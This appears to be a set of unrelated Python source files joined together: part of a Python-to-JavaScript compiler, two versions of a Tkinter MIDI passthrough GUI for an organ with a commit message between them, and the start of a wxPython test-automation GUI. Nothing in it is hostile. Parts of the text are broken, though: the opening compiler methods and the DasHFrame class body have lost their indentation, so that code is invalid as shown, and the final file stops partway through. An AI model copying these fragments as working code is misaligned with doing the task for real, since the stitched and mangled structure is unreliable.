if node.orelse:
tpl.append('else {')
for c in node.orelse:
extend(tpl, indent(self.visit(c)))
tpl.append('}')
return tpl
# Py2: Raise(expr? type, expr? inst, expr? tback)
# Py3: Raise(expr? exc, expr? cause)
def visit_Raise(self, node):
if hasattr(node, 'type'):
return 'throw {0}'.format(self.visit(node.type))
else:
return 'throw {0}'.format(self.visit(node.exc))
# TryExcept(stmt* body, excepthandler* handlers, stmt* orelse)
def visit_TryExcept(self, node):
if not node.branch:
raise SyntaxError('Try block not inside a function block')
try_except_point = node.branch.create()
try_continue_point = node.branch.create()
tpl = ['$ctx.try_stack.push({0});'.format(try_except_point)]
for c in node.body:
extend(tpl, self.visit(c))
extend(tpl, [
'$ctx.try_stack.pop();',
'$ctx.next_state = {0}; continue;'.format(try_continue_point),
'case {0}:'.format(try_except_point)
])
for c in node.handlers:
extend(tpl, self.visit(c))
extend(tpl, 'case {0}:'.format(try_continue_point))
return tpl
# Try(stmt* body, excepthandler* handlers, stmt* orelse, stmt* finalbody)
def visit_Try(self, node):
return self.visit_TryExcept(node)
# Import(alias* names)
def visit_Import(self, node):
return ''
# ImportFrom(identifier? module, alias* names, int? level)
def visit_ImportFrom(self, node):
return ''
# Expr(expr value)
def visit_Expr(self, node):
    """An expression statement compiles to its value expression."""
    value_js = self.visit(node.value)
    return value_js
# Pass
def visit_Pass(self, node):
    """``pass`` has no JS equivalent; emit a marker comment line."""
    return ['// pass']
# Break
def visit_Break(self, node):
    """Jump to the enclosing loop's break label via the state machine."""
    if not node.break_point:
        raise SyntaxError('Break not inside a loop block')
    return '$ctx.next_state = {0}; continue;'.format(node.break_point)
# Continue
def visit_Continue(self, node):
    """Jump back to the enclosing loop's test label via the state machine."""
    if not node.loop_point:
        raise SyntaxError('Continue not inside a loop block')
    return '$ctx.next_state = {0}; continue;'.format(node.loop_point)
# BoolOp(boolop op, expr* values)
def visit_BoolOp(self, node):
    """Join the operands with the JS operator for ``and``/``or``."""
    joiner = JSCompiler.BOOL_OP[type(node.op)]
    parts = [self.visit(v) for v in node.values]
    return '({0})'.format(joiner.join(parts))
# BinOp(expr left, operator op, expr right)
def visit_BinOp(self, node):
    """Binary arithmetic/bitwise op -> infix JS expression."""
    return '{0} {1} {2}'.format(
        self.visit(node.left),
        JSCompiler.BIN_OP[type(node.op)],
        self.visit(node.right))
# UnaryOp(unaryop op, expr operand)
def visit_UnaryOp(self, node):
    """Unary op -> prefix JS expression; operand parenthesised for safety."""
    return '{0}({1})'.format(
        JSCompiler.UNARY_OP[type(node.op)],
        self.visit(node.operand))
# Dict(expr* keys, expr* values)
def visit_Dict(self, node):
    """Dict literal -> JS object literal."""
    pairs = []
    for key, value in zip(node.keys, node.values):
        pairs.append('{0}: {1}'.format(self.visit(key), self.visit(value)))
    return '{{ {0} }}'.format(', '.join(pairs))
# Yield(expr? value)
def visit_Yield(self, node):
    """Suspend the generator state machine, handing back the yielded value.

    Stores the value in ``$ctx.result``, records the resume label, and
    returns the context object; a ``case`` label marks the resume point.
    """
    if not node.branch:
        raise SyntaxError('Yield not inside a function block')
    resume = node.branch.create()
    return [
        'var $tmp = {0};'.format(self.visit(node.value)),
        '$ctx.next_state = {0};'.format(resume),
        '$ctx.result = $tmp;',
        'return $ctx;',
        'case {0}:'.format(resume),
    ]
#Compare(expr left, cmpop* ops, expr* comparators)
def visit_Compare(self, node):
    """Expand a chained comparison (a < b < c) into &&-joined pairs.

    NOTE(review): each middle comparand is emitted twice, so a
    side-effecting expression is evaluated twice in the generated JS --
    confirm this is acceptable for the supported input programs.
    """
    clauses = []
    prev = self.visit(node.left)
    for op, comparator in zip(node.ops, node.comparators):
        cur = self.visit(comparator)
        clauses.append('{0} {1} {2}'.format(
            prev, JSCompiler.COMPARE_OP[type(op)], cur))
        prev = cur
    return '&&'.join(clauses)
# Call(
#     expr func, expr* args, keyword* keywords, xpr? starargs, expr? kwargs)
def visit_Call(self, node):
    """Translate a call expression.

    Special cases: calls to the module's ``JSCode`` marker embed their
    string argument as raw JS; ``print(...)`` reuses the Print lowering.
    Method calls keep their receiver as the JS ``this`` via ``apply``;
    bare calls pass the current ``this``.
    """
    func = self.visit(node.func)
    if isinstance(node.func, ast.Attribute):
        func_context = self.visit(node.func.value)
    else:
        func_context = 'this'
    # JSCode escape hatch: first argument is a raw JS string literal.
    if getattr(self.module, func, None) is JSCode:
        return node.args[0].s
    if func == 'print':
        # Py3-style print() call: reuse the Py2 Print-statement lowering.
        node.values = node.args
        return self.visit_Print(node)
    args = ', '.join([self.visit(a) for a in node.args])
    return '{0}.apply({1}, [{2}])'.format(func, func_context, args)
# Num(object n)
def visit_Num(self, node):
    """Numeric literal -> its decimal string representation."""
    return '{0}'.format(node.n)
# Str(string s)
def visit_Str(self, node):
    """String literal -> double-quoted JS string.

    BUG FIX: the original emitted backslashes and double quotes raw,
    producing invalid JS for strings containing them; they are escaped
    here.  Embedded newlines become ``\n`` plus a JS backslash line
    continuation, keeping the generated literal readable, as before.
    """
    escaped = node.s.replace('\\', '\\\\').replace('"', '\\"')
    return '"{0}"'.format(escaped).replace('\n', '\\n\\\n')
# Attribute(expr value, identifier attr, expr_context ctx)
def visit_Attribute(self, node):
    """Attribute access: loads go through the runtime ``getattr`` helper,
    stores use plain JS dot syntax."""
    if isinstance(node.ctx, ast.Load):
        return 'getattr({0}, "{1}")'.format(self.visit(node.value), node.attr)
    return '{0}.{1}'.format(self.visit(node.value), node.attr)
# Subscript(expr value, slice slice, expr_context ctx)
def visit_Subscript(self, node):
    """Subscript -> JS bracket indexing."""
    return '{0}[{1}]'.format(self.visit(node.value), self.visit(node.slice))
# Name(identifier id, expr_context ctx)
def visit_Name(self, node):
    """Resolve an identifier: scope lookup first, then the literal
    singletons None/True/False, then an optional explicit context prefix,
    finally the bare name."""
    resolved = self.lookup(node.id)
    if resolved:
        return resolved
    singletons = {'None': 'undefined', 'True': 'true', 'False': 'false'}
    if node.id in singletons:
        return singletons[node.id]
    if node.context:
        return '{0}.{1}'.format(node.context, node.id)
    return node.id
# List(expr* elts, expr_context ctx)
def visit_List(self, node):
    """List literal -> JS array literal."""
    return '[{0}]'.format(', '.join(self.visit(elt) for elt in node.elts))
# Tuple(expr* elts, expr_context ctx)
def visit_Tuple(self, node):
    """Tuple literal -> JS array literal (JS has no tuple type)."""
    return '[{0}]'.format(', '.join(self.visit(elt) for elt in node.elts))
# Index(expr value)
def visit_Index(self, node):
    """Older-AST Index wrapper: unwrap to the inner value expression."""
    return self.visit(node.value)
# ExceptHandler(expr? type, identifier? name, stmt* body)
def visit_ExceptHandler(self, node):
    """One except clause -> an ``if`` on the pending ``$exception``: a typed
    clause narrows with ``instanceof``, a bare clause matches anything
    truthy.  The handler clears ``$exception`` once it has run."""
    lines = []
    if node.type:
        lines.append('if ($exception instanceof {0}) {{'.format(
            self.visit(node.type)))
    else:
        lines.append('if ($exception) {')
    for stmt in node.body:
        extend(lines, indent(self.visit(stmt)))
    lines.append(indent('$exception = undefined;'))
    lines.append('}')
    return lines
# arg = (identifier arg, expr? annotation)
def visit_arg(self, node):
    """Py3 function argument node -> its bare name (annotation ignored)."""
    return str(node.arg)
def indent(lines, spaces=2, level=1):
    """Prefix a line, or every line of a list, with ``spaces * level`` blanks."""
    pad = ' ' * (spaces * level)
    if isinstance(lines, list):
        return [pad + line for line in lines]
    return pad + lines
def extend(template, lines):
    """Append ``lines`` to ``template`` in place and return it.

    A list is spliced in element-by-element; any other value (typically a
    single string) is appended as one entry.
    """
    appender = template.extend if isinstance(lines, list) else template.append
    appender(lines)
    return template
def is_generator(node):
    """Return True if *node* contains a yield (making it a generator).

    For a FunctionDef, only its own body statements are scanned; any other
    node is scanned directly.  Detection is delegated to ``YieldSearch``.
    """
    searcher = YieldSearch()
    searcher.found_yield = False
    targets = node.body if isinstance(node, ast.FunctionDef) else [node]
    for target in targets:
        searcher.visit(target)
    return searcher.found_yield
def js_compile(obj):
    """Compile *obj* (a module/class/function) to JS, caching on ``__js__``."""
    cached = getattr(obj, '__js__', None)
    if not cached:
        tree = ast.parse(inspect.getsource(obj))
        cached = obj.__js__ = JSCompiler(obj).visit(tree)
    return cached
def runtime():
    """Return the JS runtime prelude: the compiled type and builtin shims."""
    from . import types, builtins
    return js_compile(types) + js_compile(builtins)
|
#!/usr/bin/env python
#
# GUI External MIDI Passthrough for Organ Donor Organelle
#
# 2015-11 ptw
from Tkinter import *
import tkFont
import sys
import signal
import re
import time
import itertools
from os.path import isfile
import mido
import rtmidi
root_bg = "#bbb"  # shared background colour for every widget in this GUI
deployed_mode = isfile("deployed.txt")  # Create this file to go full-screen, etc.
def initialize_MIDI_inout():
    """Initialize MIDI input and output ports using RTMIDI through mido.

    Opens the console output port (a MIO adapter in the deployed
    configuration) and all four input ports of the MIDIPLUS interface.

    Returns:
        (inports, outport): list of the four opened input ports, and the
        opened output port.
    Exits the process with status 1 if any port cannot be opened.
    """
    # Select rtmidi as our backend.
    mido.set_backend('mido.backends.rtmidi')
    #print "Backend selected is %s " % mido.backend

    # Pick the right port to output on: in the deployed configuration it's
    # a MIO adapter.
    outport = None
    for name in mido.get_output_names():
        if re.match(r'mio', name):
            try:
                outport = mido.open_output(name)
                break
            except Exception:  # was a bare except; keep trying other ports
                pass
    if not outport:
        print("Unable to open the MIO MIDI output port.")
        sys.exit(1)

    # Locate the ports of the MIDIPLUS interface and open them for input.
    # BUG FIX: open_midi_input_port() returns None on failure; the original
    # appended unconditionally, so len(inports) was always 4 and the error
    # branch below could never trigger.
    port_prefix = 'MIDI4x4.*:'
    inports = []
    for port in ('0', '1', '2', '3'):
        inport = open_midi_input_port(port_prefix + port)
        if inport is not None:
            inports.append(inport)
    if len(inports) != 4:
        print("Unable to open MIDI input ports. Is the MIDIPLUS connected?")
        sys.exit(1)
    return (inports, outport)
def open_midi_input_port(regex):
    """Open and return the first MIDI input port whose name matches *regex*.

    Returns None when no matching port can be opened, so the caller can
    detect the failure.
    """
    for name in mido.get_input_names():
        if re.match(regex, name):
            try:
                p = mido.open_input(name)
            except Exception:  # was a bare except; keep trying other matches
                pass
            else:
                return p
    return None  # explicit: no matching port could be opened
# Open the MIDI hardware first; any failure exits before the GUI is built.
inports,outport = initialize_MIDI_inout()

root = Tk()
root.config(bg=root_bg)

# This program ends normally when we receive a SIGUSR1 signal from the supervisor.
def handle_sigusr1(signum, frame):
    root.quit()
signal.signal(signal.SIGUSR1, handle_sigusr1)
def poll_midi():
    """Poll the MIDI input ports.
    Polling might seem ugly here, but it is apparently the only way that works.
    Mido can provide a callback when each message comes in, but that callback runs
    on another thread, and Tkinter prohibits doing much of anything on another thread.
    The other thread could enqueue a message to the main thread, but then apparently
    the recommended way to check such a queue would be ... polling. If there were a
    thread-safe way to put an event into Tkinter's main event queue, we could avoid
    polling, but there apparently isn't.
    """
    for passthru in passthrus:
        for message in passthru.port.iter_pending():
            passthru.handle_message(message)
    # Re-arm: poll again in 50 ms on Tk's event loop.
    root.after(50, poll_midi)
def everything_off():
    """Turn off every note, in case it's stuck playing.

    BUG FIX: MIDI note numbers run 0-127; the original started at 1 and so
    could leave note 0 stuck.  NOTE(review): only mido's default channel is
    covered here -- confirm the console listens on that channel.
    """
    for note_number in range(128):
        outport.send(mido.Message('note_off', note=note_number, velocity=100))
def configure_console(flagMidi=1, flagKBecho=1, flagGhostBuster=1):
    """Send a SysEx to the console to set the configuration flags.
    Definitions copied from the Arduino code:
    // SysEx format:
    // Byte#  Value   Meaning
    // 0      F0      Start of SysEx command, defined by MIDI standard
    // 1      7D      Manufacturer code reserved for "educational use"
    // 2      55      my command code for setting the flags
    // 3      0,1,2   flagMidi
    // 4      0 or 1  flagKBecho
    // 5      0 or 1  flagGhostBuster
    // etc. for more flags
    // N      F7      End of SysEx command, defined by MIDI standard
    """
    # mido supplies the F0/F7 framing bytes; only the payload is passed here.
    outport.send(mido.Message('sysex', data=[0x7d, 0x55, flagMidi, flagKBecho, flagGhostBuster]))
enabledColor = 'green'  # checkbox background while a port row is enabled
class MidiPortPassthru():
    """Object to handle configuration and passthrough of MIDI notes from an input port.
    The object knows its port, and creates a GUI to set how messages from that port
    are to be passed through to the console. It then handles messages according to
    the user settings.
    """
    def __init__(self, port):
        self.port = port
        self.enabled = IntVar()
        self.enabled.set(1)  # defaults to enabled
        self.gui = Frame(root, height=110, width=800, bg=root_bg, bd=2, relief=SUNKEN)
        # Port names end in '0'..'3'; show them 1-based for humans.
        port_name = "MIDI In " + chr(ord(port.name[-1])+1)
        self.portlabel = Label(self.gui, text=port_name+':', font=("Helvetica", 24), fg='black', bg=root_bg)
        self.portlabel.pack(side=LEFT)
        self.enabledButton = Checkbutton(self.gui, text="Enabled ", font=("Helvetica", 18), padx=0, pady=0, bg=enabledColor, activebackground=enabledColor, highlightbackground=enabledColor, variable=self.enabled, command=self._enabledCallback)
        self.enabledButton.pack(side=LEFT)
        #!!! construct rest of GUI here

    def _enabledCallback(self):
        # Checkbox toggled: grey the row out and silence the organ when disabled.
        if self.enabled.get() == 1:
            self.portlabel.config(fg='black')
            self.enabledButton.config(bg=enabledColor, activebackground=enabledColor, highlightbackground=enabledColor)
            #!!! enable secondary controls here
        else:
            self.portlabel.config(fg='gray')
            self.enabledButton.config(bg=root_bg, activebackground=root_bg, highlightbackground=root_bg)
            #!!! disable secondary controls here
            everything_off()  # just in case there are notes left playing
            # This disrupts the other channels, but to avoid that
            # we'd need to keep track of all the notes played. Ugh.
            pass

    def handle_message(self, msg):
        # Forward an incoming message to the console when this row is enabled.
        if self.enabled.get() == 1:
            #!!! lots more logic here
            outport.send(msg)
configure_console(flagMidi=2)  # Make sure console allows access to both ranks

Label(root, text="Play From MIDI Devices", font=("Helvetica", 36), fg='red', bg=root_bg, padx=4, pady=2).pack()

# Associate each input port with a MidiPortPassthru and put their GUIs on the screen.
passthrus = []
for port in inports:
    passthru = MidiPortPassthru(port)
    passthrus.append(passthru)
    passthru.gui.pack(fill=BOTH, expand=1)

poll_midi()  # kick off a frequent poll of the MIDI input port

if deployed_mode:
    root.attributes("-fullscreen", True)
else:
    # for debug, use the same screen size as the real screen, in a handy screen position.
    root.geometry("800x480+50+50")

root.mainloop()

# mainloop() returned: SIGUSR1 (or a window close) ended the GUI.
print("Here we are cleaning up.")
Implement MIDI passthru to the different ranks of pipes.
We chose five discrete modes, offered as individual on-screen buttons,
instead of a more general but more complex user interface.
#!/usr/bin/env python
#
# GUI External MIDI Passthrough for Organ Donor Organelle
#
# 2015-11 ptw
from Tkinter import *
import tkFont
import sys
import signal
import re
import time
import itertools
from os.path import isfile
import mido
import rtmidi
root_bg = "#bbb"  # shared background colour for every widget in this GUI
deployed_mode = isfile("deployed.txt")  # Create this file to go full-screen, etc.
def initialize_MIDI_inout():
    """Initialize MIDI input and output ports using RTMIDI through mido.

    Opens the console output port (a MIO adapter in the deployed
    configuration) and all four input ports of the MIDIPLUS interface.

    Returns:
        (inports, outport): list of the four opened input ports, and the
        opened output port.
    Exits the process with status 1 if any port cannot be opened.
    """
    # Select rtmidi as our backend.
    mido.set_backend('mido.backends.rtmidi')
    #print "Backend selected is %s " % mido.backend

    # Pick the right port to output on: in the deployed configuration it's
    # a MIO adapter.
    outport = None
    for name in mido.get_output_names():
        if re.match(r'mio', name):
            try:
                outport = mido.open_output(name)
                break
            except Exception:  # was a bare except; keep trying other ports
                pass
    if not outport:
        print("Unable to open the MIO MIDI output port.")
        sys.exit(1)

    # Locate the ports of the MIDIPLUS interface and open them for input.
    # BUG FIX: open_midi_input_port() returns None on failure; the original
    # appended unconditionally, so len(inports) was always 4 and the error
    # branch below could never trigger.
    port_prefix = 'MIDI4x4.*:'
    inports = []
    for port in ('0', '1', '2', '3'):
        inport = open_midi_input_port(port_prefix + port)
        if inport is not None:
            inports.append(inport)
    if len(inports) != 4:
        print("Unable to open MIDI input ports. Is the MIDIPLUS connected?")
        sys.exit(1)
    return (inports, outport)
def open_midi_input_port(regex):
    """Open and return the first MIDI input port whose name matches *regex*.

    Returns None when no matching port can be opened, so the caller can
    detect the failure.
    """
    for name in mido.get_input_names():
        if re.match(regex, name):
            try:
                p = mido.open_input(name)
            except Exception:  # was a bare except; keep trying other matches
                pass
            else:
                return p
    return None  # explicit: no matching port could be opened
# Open the MIDI hardware first; any failure exits before the GUI is built.
inports,outport = initialize_MIDI_inout()

root = Tk()
root.config(bg=root_bg)

# This program ends normally when we receive a SIGUSR1 signal from the supervisor.
def handle_sigusr1(signum, frame):
    root.quit()
signal.signal(signal.SIGUSR1, handle_sigusr1)
def poll_midi():
    """Poll the MIDI input ports.
    Polling might seem ugly here, but it is apparently the only way that works.
    Mido can provide a callback when each message comes in, but that callback runs
    on another thread, and Tkinter prohibits doing much of anything on another thread.
    The other thread could enqueue a message to the main thread, but then apparently
    the recommended way to check such a queue would be ... polling. If there were a
    thread-safe way to put an event into Tkinter's main event queue, we could avoid
    polling, but there apparently isn't.
    """
    for passthru in passthrus:
        for message in passthru.port.iter_pending():
            passthru.handle_message(message)
    # Re-arm: poll again in 50 ms on Tk's event loop.
    root.after(50, poll_midi)
def everything_off():
    """Turn off every note, in case it's stuck playing.

    BUG FIX: MIDI note numbers run 0-127; the original started at 1 and so
    could leave note 0 stuck.  NOTE(review): only mido's default channel is
    covered here -- confirm the console listens on that channel.
    """
    for note_number in range(128):
        outport.send(mido.Message('note_off', note=note_number, velocity=100))
def configure_console(flagMidi=1, flagKBecho=1, flagGhostBuster=1):
    """Send a SysEx to the console to set the configuration flags.
    Definitions copied from the Arduino code:
    // SysEx format:
    // Byte#  Value   Meaning
    // 0      F0      Start of SysEx command, defined by MIDI standard
    // 1      7D      Manufacturer code reserved for "educational use"
    // 2      55      my command code for setting the flags
    // 3      0,1,2   flagMidi
    // 4      0 or 1  flagKBecho
    // 5      0 or 1  flagGhostBuster
    // etc. for more flags
    // N      F7      End of SysEx command, defined by MIDI standard
    """
    # mido supplies the F0/F7 framing bytes; only the payload is passed here.
    outport.send(mido.Message('sysex', data=[0x7d, 0x55, flagMidi, flagKBecho, flagGhostBuster]))
enabledColor = 'green'  # checkbox background while a port row is enabled
class MidiPortPassthru():
    """Object to handle configuration and passthrough of MIDI notes from an input port.
    The object knows its port, and creates a GUI to set how messages from that port
    are to be passed through to the console. It then handles messages according to
    the user settings.
    A MIDI port can be translated to console notes in a few different ways:
     * Thru mode -- all messages are passed thru on the channel they're received on
     * 4' Rank mode -- Note On and Note Off messages on any channel go to the 4' rank
     * 8' Rank mode -- Note On and Note Off messages on any channel go to the 8' rank
     * Both Ranks mode -- Note On and Note Off messages on any channel go to both ranks
     * Max mode -- Note On and Note Off messages on any channel go to both ranks, AND
       are tripled with octave and suboctave couplers.
    The controls could be more general, but it would be too complex on screen.
    """
    MODE_PASSTHRU, MODE_4FT, MODE_8FT, MODE_BOTH, MODE_MAX = range(5)

    # (label, mode) pairs for the radio-button row.
    ModeButtons = [
        ("Thru", MODE_PASSTHRU),
        ("4' Rank", MODE_4FT),
        ("8' Rank", MODE_8FT),
        ("Both Ranks", MODE_BOTH),
        ("Max", MODE_MAX)
    ]

    # BUG FIX: ModeButtonColor was referenced in __init__ but never defined
    # anywhere in the program, raising NameError the first time a row was
    # built.  NOTE(review): intended colour unknown; the shared background
    # colour is used as a default -- confirm.
    ModeButtonColor = root_bg

    def __init__(self, port):
        self.port = port
        self.enabled = IntVar()
        self.enabled.set(1)  # defaults to enabled
        self.gui = Frame(root, height=110, width=800, bg=root_bg, bd=2, relief=SUNKEN)
        # Port names end in '0'..'3'; show them 1-based for humans.
        port_name = "MIDI In " + chr(ord(port.name[-1])+1)
        self.portlabel = Label(self.gui, text=port_name+':', font=("Helvetica", 24), fg='black', bg=root_bg)
        self.portlabel.pack(side=LEFT)
        self.enabledButton = Checkbutton(self.gui, text="Enabled ", font=("Helvetica", 18), padx=0, pady=0, bg=enabledColor, activebackground=enabledColor, highlightbackground=enabledColor, variable=self.enabled, command=self._enabledCallback)
        self.enabledButton.pack(side=LEFT)
        self.mode = IntVar()
        # BUG FIX: class attributes are not visible as bare names inside a
        # method; the original's bare MODE_PASSTHRU / ModeButtons /
        # ModeButtonColor all raised NameError.  Qualify with `self.`.
        self.mode.set(self.MODE_PASSTHRU)
        self.modeButtons = []
        for text, value in self.ModeButtons:
            self.modeButtons.append(Radiobutton(self.gui, text=text, value=value, variable=self.mode, bg=self.ModeButtonColor, highlightcolor=self.ModeButtonColor, indicatoron=0))
        for button in self.modeButtons:
            button.pack(side=LEFT)

    def _enabledCallback(self):
        # Checkbox toggled: grey/disable the row and silence the organ when off.
        if self.enabled.get() == 1:
            self.portlabel.config(fg='black')
            self.enabledButton.config(bg=enabledColor, activebackground=enabledColor, highlightbackground=enabledColor)
            for button in self.modeButtons:
                button.config(state=NORMAL)
        else:
            self.portlabel.config(fg='gray')
            self.enabledButton.config(bg=root_bg, activebackground=root_bg, highlightbackground=root_bg)
            for button in self.modeButtons:
                button.config(state=DISABLED)
            everything_off()  # just in case there are notes left playing
            # This disrupts the other channels, but to avoid that
            # we'd need to keep track of all the notes played. Ugh.

    def handle_message(self, msg):
        # Forward an incoming message to the console when this row is enabled.
        if self.enabled.get() == 1:
            #!!! lots more logic here
            outport.send(msg)
configure_console(flagMidi=2)  # Make sure console allows access to both ranks

Label(root, text="Play From MIDI Devices", font=("Helvetica", 36), fg='red', bg=root_bg, padx=4, pady=2).pack()

# Associate each input port with a MidiPortPassthru and put their GUIs on the screen.
passthrus = []
for port in inports:
    passthru = MidiPortPassthru(port)
    passthrus.append(passthru)
    passthru.gui.pack(fill=BOTH, expand=1)

poll_midi()  # kick off a frequent poll of the MIDI input port

if deployed_mode:
    root.attributes("-fullscreen", True)
else:
    # for debug, use the same screen size as the real screen, in a handy screen position.
    root.geometry("800x480+50+50")

root.mainloop()

# mainloop() returned: SIGUSR1 (or a window close) ended the GUI.
print("Here we are cleaning up.")
|
#!/usr/bin/python
'''The MIT License (MIT)
Copyright (c) 2017 Yu Xiong Wei(try.dash.now@gmail.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.'''
__author__ = 'sean yu (Yu, Xiongwei)'
__doc__ = '''
it's GUI of DasH aka Do as Human
created 2017-05-06 by Sean Yu
'''
from datetime import datetime
import wx.grid as gridlib
import wx
from gui.MainFrame import MainFrame
import os
from lib.common import load_bench, caller_stack_info,info, get_next_in_ring_list,get_folder_item, info,debug, warn, error, parse_command_line, call_function_in_module
import re
import time
import threading
import ConfigParser
import sys
import inspect
import Queue
from SessionTab import SessionTab
import imp
import types
#from dut import dut
class RedirectText(object):
    """Tee sys.stdout/stderr into a wx TextCtrl and, optionally, a log file.

    Lines that look like errors are highlighted red-on-yellow; everything
    else is green-on-black.  Writes are serialized with a lock because
    callers may write from worker threads; the widget update itself is
    marshalled to the GUI thread with wx.CallAfter.
    """
    font_point_size = 10   # base size; bumped +2 for error lines
    old_stdout = None      # the real streams, restored by the owner on close
    old_stderr = None
    write_lock = None
    log_file = None

    def __init__(self, aWxTextCtrl, log_path=None):
        self.old_stderr, self.old_stdout = sys.stderr, sys.stdout
        self.out = aWxTextCtrl
        self.font_point_size = self.out.GetFont().PointSize
        self.write_lock = threading.Lock()
        if log_path:
            name = '{}/dash.log'.format(log_path)
            self.log_file = open(name, 'w+')
            # Expose a real fileno so code probing sys.stdout keeps working.
            self.fileno = self.log_file.fileno

    def write(self, string):
        # BUG FIX: the original acquired/released the lock manually; any
        # exception while writing left it held and deadlocked every later
        # write.  `with` releases the lock on all paths.
        with self.write_lock:
            self.old_stdout.write(string)
            #string = string.replace('\\033\[[0-9\;]+m', '')
            #self.old_stderr.write(string)
            if re.search('error|\s+err\s+|fail|wrong', string.lower()):
                self.out.SetDefaultStyle(wx.TextAttr(wx.RED, wx.YELLOW, font=wx.Font(self.font_point_size+2, family=wx.DEFAULT, style=wx.NORMAL, weight=wx.BOLD, faceName='Consolas')))
            else:
                self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK, font=wx.Font(self.font_point_size, family=wx.DEFAULT, style=wx.NORMAL, weight=wx.NORMAL, faceName='Consolas')))
            wx.CallAfter(self.out.AppendText, string)
            if self.log_file:
                self.log_file.write(string)
                self.log_file.flush()

    def close(self):
        # Flush and close the log file; the wx control is owned elsewhere.
        if self.log_file:
            self.log_file.flush()
            self.log_file.close()
class process_info(object):
    """Lightweight record of a launched test-script subprocess.

    ``returncode`` is a read-only property delegating to the live process
    object, so it stays current after the process exits.
    """
    process = None
    pid = None
    full_name = None

    def __init__(self, name, process):
        self.process = process
        self.pid = process.pid
        self.full_name = name
        # BUG FIX: the original also assigned `self.returncode = ...` here,
        # which raises AttributeError because `returncode` is a read-only
        # property on the class; the property alone is sufficient.

    @property
    def returncode(self):
        return self.process.returncode
class FileEditor(wx.Panel):
    """Editor tab for one file: a rich text control for text files, or a
    wx.grid spreadsheet for tabular files.  The buffer is written back to
    disk when the tab closes.

    NOTE(review): block nesting below is reconstructed from a source whose
    indentation was lost -- confirm against the original revision.
    """
    editor = None          # the wx.TextCtrl or gridlib.Grid widget
    font_size = 10         # current grid font size (Ctrl+wheel zoomable)
    parent = None
    type = None            # 'text' or 'grid'
    sessions_node = None
    function_node = None
    case_suite_node = None
    full_file_name = None
    file_instance = None

    def on_close(self):
        # Persist the buffer back to the original file, if one was loaded.
        if self.full_file_name:
            data = self.editor.GetValue()
            with open(self.full_file_name, 'w') as f:
                f.write(data)
                f.flush()
        #done 2017-9-12: handle close tab in edit_area

    def __init__(self, parent, title='pageOne', type='grid', file_name=None):
        wx.Panel.__init__(self, parent)
        self.parent = parent
        self.type = type
        self.full_file_name = file_name
        #self.editor = wx.TextCtrl(self, style = wx.TE_MULTILINE|wx.TE_RICH2|wx.EXPAND|wx.ALL, size=(-1,-1))
        if type in ['text']:
            self.editor = wx.TextCtrl(self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_AUTO_URL|wx.VSCROLL|wx.TE_RICH|wx.TE_MULTILINE&(~wx.TE_PROCESS_ENTER))
            #wx.richtext.RichTextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS )
            with open(self.full_file_name, 'r') as f:
                for line in f.readlines():
                    self.editor.AppendText(line)
        else:
            # Grid mode: column 0 holds function names, the rest arguments.
            self.editor = gridlib.Grid(self)
            self.editor.CreateGrid(50, 5)
            col = self.editor.GetNumberCols()
            row = self.editor.GetNumberRows()
            function_color = 'black'
            arg_color = 'blue'
            for c in range(0, col):
                if c < 1:
                    self.editor.SetColLabelValue(c, 'Function Name')
                else:
                    self.editor.SetColLabelValue(c, 'arg# {}'.format(c))
                for r in range(0, row):
                    self.editor.SetCellTextColour(r, c, function_color if c < 1 else arg_color)
            for r in range(0, row):
                self.editor.SetCellFont(r, 0, wx.Font(self.font_size, wx.SWISS, wx.NORMAL, wx.BOLD))
        self.editor.Bind(wx.EVT_MOUSEWHEEL, self.editor_OnMouseWheel)
        sizer = wx.BoxSizer()
        sizer.Add(self.editor, 1, wx.EXPAND)
        self.SetSizer(sizer)

    def editor_OnMouseWheel(self, event):
        # Ctrl + mouse wheel zooms the editor font in and out.
        min_font_size = 5
        interval_step = 2
        if event.ControlDown():
            pass
        else:
            return
        if event.GetWheelRotation() < 0:
            if self.font_size > min_font_size:
                self.font_size -= interval_step
        else:
            self.font_size += 1
        if self.type in ['text']:
            f = self.editor.GetFont()
            f.PointSize = self.font_size
            self.editor.SetFont(f)
        else:
            # Grid mode: re-apply the font cell by cell.
            col = self.editor.GetNumberCols()
            row = self.editor.GetNumberRows()
            for c in range(0, col):
                for r in range(0, row):
                    f = self.editor.GetCellFont(r, c)
                    f.PointSize = self.font_size
                    self.editor.SetCellFont(r, c, f)
        self.Refresh()
        #wx.StaticText(self, -1, "THIS IS A PAGE OBJECT", (20,20))
#wx.StaticText(self, -1, "THIS IS A PAGE OBJECT", (20,20))
#DONE: DasHFrame should handle CLOSE event when closing the app, call on_close_tab_in_edit_area for all opened sessions and files
class DasHFrame(MainFrame):#wx.Frame
ini_setting = None
#m_left_navigator =None
redir = None
edit_area=None
tabs_in_edit_area = None
src_path = None
sessions_alive=None
sequence_queue=None
history_cmd = []
history_cmd_index = -1
import_modules={'TC':'TC'}
lib_path ='./lib'
log_path = '../log'
session_path = './sessions'
running_process=None
dict_test_report= None
def __init__(self, parent=None, ini_file='./gDasH.ini'):
    """Build the main window: read gDasH.ini, redirect stdout/stderr into
    the log pane, and assemble the navigator / editor / log layout."""
    #wx.Frame.__init__(self, None, title="DasH")
    self.dict_test_report = {}
    self.running_process = list()
    self.tabs_in_edit_area = []
    self.sessions_alive = {}
    MainFrame.__init__(self, parent=parent)
    self.sequence_queue = Queue.Queue()
